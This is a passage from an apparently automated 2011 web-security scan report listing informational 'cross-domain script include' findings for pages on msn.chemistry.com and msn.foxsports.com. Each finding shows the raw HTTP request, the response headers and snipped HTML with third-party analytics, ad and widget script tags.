Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cp/landing/57269 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=8529a559-f7f1-4949-aed2-acc51bf1723b; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Session=SID=A963DE98-E013-45FE-A22F-7F3E03113FAE&Th=11&TID=508259; path=/
Set-Cookie: UMID=6abfa29e-5c60-42a5-b7be-7db42c89c8cb; expires=Sun, 29-Jan-2012 23:49:06 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
</script>
       
<script type="text/javascript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js"></script>
...[SNIP]...
</div>
   
<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/om/js/lt/lt.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</div>

   
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.231. http://msn.foxsports.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 302910
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=15
Date: Sat, 29 Jan 2011 23:49:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.232. http://msn.foxsports.com/collegebasketball

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /collegebasketball

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /collegebasketball HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 250446
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=17
Date: Sat, 29 Jan 2011 23:49:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.233. http://msn.foxsports.com/collegebasketball/scores

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /collegebasketball/scores

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /collegebasketball/scores HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 352641
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 29 Jan 2011 23:49:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.234. http://msn.foxsports.com/collegefootball

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /collegefootball

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /collegefootball HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 263784
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=34
Date: Sat, 29 Jan 2011 23:49:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.235. http://msn.foxsports.com/fantasy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /fantasy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /fantasy HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 234449
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=18
Date: Sat, 29 Jan 2011 23:49:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.236. http://msn.foxsports.com/foxsoccer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /foxsoccer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /foxsoccer HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 232970
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=34
Date: Sat, 29 Jan 2011 23:49:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag --><script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.237. http://msn.foxsports.com/golf/leaderboard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /golf/leaderboard

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /golf/leaderboard HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 253260
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 29 Jan 2011 23:49:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.238. http://msn.foxsports.com/mlb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mlb HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 277649
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=12
Date: Sat, 29 Jan 2011 23:49:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.239. http://msn.foxsports.com/mlb/story/Orioles-hope-to-add-Guerrero-to-revamped-roster-83871116

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/Orioles-hope-to-add-Guerrero-to-revamped-roster-83871116

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mlb/story/Orioles-hope-to-add-Guerrero-to-revamped-roster-83871116 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 237436
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 29 Jan 2011 23:49:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.240. http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 234477
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=35
Date: Sat, 29 Jan 2011 23:49:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.241. http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 237610
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=39
Date: Sat, 29 Jan 2011 23:49:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.242. http://msn.foxsports.com/nascar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nascar

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nascar HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 276706
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=25
Date: Sat, 29 Jan 2011 23:49:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.243. http://msn.foxsports.com/nba

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nba HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 276446
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=24
Date: Sat, 29 Jan 2011 23:49:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.244. http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 223854
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=28
Date: Sat, 29 Jan 2011 23:50:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.245. http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252681
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=1
Date: Sat, 29 Jan 2011 23:50:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.246. http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 257781
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=36
Date: Sat, 29 Jan 2011 23:49:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.247. http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 259031
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=6
Date: Sat, 29 Jan 2011 23:50:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.248. http://msn.foxsports.com/nfl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nfl HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
